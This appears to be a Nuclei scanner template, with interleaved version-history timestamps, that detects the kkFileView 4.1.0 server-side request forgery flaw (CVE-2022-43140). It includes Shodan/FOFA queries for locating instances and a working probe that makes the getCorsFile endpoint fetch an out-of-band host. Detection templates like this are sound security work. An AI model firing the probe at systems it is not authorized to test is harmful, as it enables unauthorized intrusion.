2023-03-26 16:17:16 +00:00
id : CVE-2022-43140
info :
2023-04-13 16:08:53 +00:00
name : kkFileView 4.1.0 - Server-Side Request Forgery
2023-03-26 16:17:16 +00:00
author : Co5mos
severity : high
description : |
2023-04-13 16:08:53 +00:00
kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the SSRF vulnerability in kkFileView 4.1.0.
2023-03-26 16:17:16 +00:00
reference :
- https://github.com/kekingcn/kkFileView/issues/392
- https://nvd.nist.gov/vuln/detail/CVE-2022-43140
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score : 7.5
cve-id : CVE-2022-43140
2023-04-19 16:20:17 +00:00
cwe-id : CWE-918
2023-10-14 11:27:55 +00:00
epss-score : 0.17957
2023-10-16 10:55:14 +00:00
epss-percentile : 0.95557
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
2023-03-26 16:17:16 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : keking
product : kkfileview
2023-09-06 11:59:08 +00:00
shodan-query : http.html:"kkFileView"
fofa-query : app="kkFileView"
2023-03-26 16:17:16 +00:00
tags : cve,cve2022,ssrf,kkFileview
2023-04-27 04:28:59 +00:00
http :
2023-03-26 16:17:16 +00:00
- method : GET
path :
2023-03-27 10:11:43 +00:00
- "{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"
2023-03-26 16:17:16 +00:00
matchers :
- type : word
2023-03-27 10:11:43 +00:00
part : body
2023-03-26 16:17:16 +00:00
words :
2023-03-27 10:11:43 +00:00
- "<h1> Interactsh Server </h1>"